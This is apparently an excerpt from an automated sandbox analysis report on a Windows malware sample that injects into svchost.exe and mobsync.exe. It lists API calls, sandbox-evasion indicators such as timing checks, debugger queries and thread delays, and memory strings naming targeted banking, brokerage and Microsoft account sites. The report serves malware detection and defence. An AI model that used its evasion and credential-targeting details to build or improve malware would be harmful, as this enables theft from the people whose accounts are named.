Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F9C74D push ecx; retf	4_2_03F9C785
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F9EF42 push esi; iretd	4_2_03F9EF45
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F91DA4 push ebp; iretd	4_2_03F91DA6
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F9F438 push esi; retf	4_2_03F9F443
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04C827FA pushad ; ret	5_2_04C827F9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04C8225F pushad ; ret	5_2_04C827F9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04C8283D push eax; iretd	5_2_04C82858
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CB09AD push ecx; mov dword ptr [esp], ecx	5_2_04CB09B6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04C8106B push edi; retf	5_2_04C8108A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04C87AAB push ecx; iretd	5_2_04C87ABE
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CB8330 pushfd ; retf	5_2_02CB833B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CB2414 push ecx; retf	5_2_02CB244C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CC0E12 push edx; iretd	5_2_02CC0E13
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CC0FE1 push cs; ret	5_2_02CC0FE2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CB0CCA push esp; ret	5_2_02CB0CCB
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CB4C09 push esi; iretd	5_2_02CB4C0C

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004448D7
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004C5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_004C5376

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00463187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00463187

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	API/Special instruction interceptor: Address: B0873C
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0337096E rdtsc

2_2_0337096E

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\mobsync.exe	API coverage: 2.4 %

Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe TID: 432	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe TID: 916	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe TID: 916	Thread sleep time: -90000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mobsync.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004A445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004A445A
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AC6D1 FindFirstFileW,FindClose,	0_2_004AC6D1
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004AC75C
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004AEF95
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004AF0F2
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_004AF3F3
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004A37EF
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004A3B12
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_004ABCBC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CBC560 FindFirstFileW,FindNextFileW,FindClose,	5_2_02CBC560

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004449A0

Source: 10O4645j.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: 10O4645j.5.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 10O4645j.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 10O4645j.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 10O4645j.5.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 10O4645j.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 10O4645j.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 10O4645j.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 10O4645j.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: TCRjLpECkFbdcm.exe, 00000004.00000002.3333963144.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3333421133.0000000002E19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 10O4645j.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 10O4645j.5.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 10O4645j.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 10O4645j.5.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: firefox.exe, 00000009.00000002.2033991659.000002118684C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHHT
Source: 10O4645j.5.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 10O4645j.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 10O4645j.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 10O4645j.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0337096E rdtsc

2_2_0337096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417543 LdrLoadDll,

2_2_00417543

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004B3F09 BlockInput,

0_2_004B3F09

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00443B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00443B3A

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00475A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00475A7C

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00444B37 LoadLibraryA,GetProcAddress,

0_2_00444B37

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00B07358 mov eax, dword ptr fs:[00000030h]	0_2_00B07358
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00B089A8 mov eax, dword ptr fs:[00000030h]	0_2_00B089A8
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00B08A08 mov eax, dword ptr fs:[00000030h]	0_2_00B08A08
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]	2_2_0332C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]	2_2_03350310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]	2_2_033D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]	2_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h]	2_2_033D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]	2_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]	2_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]	2_2_033663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]	2_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]	2_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]	2_2_033EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h]	2_2_033B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]	2_2_0332823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]	2_2_0332826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]	2_2_0332A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]	2_2_03336259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]	2_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]	2_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]	2_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]	2_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]	2_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]	2_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]	2_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]	2_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]	2_2_03360124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]	2_2_033DA118
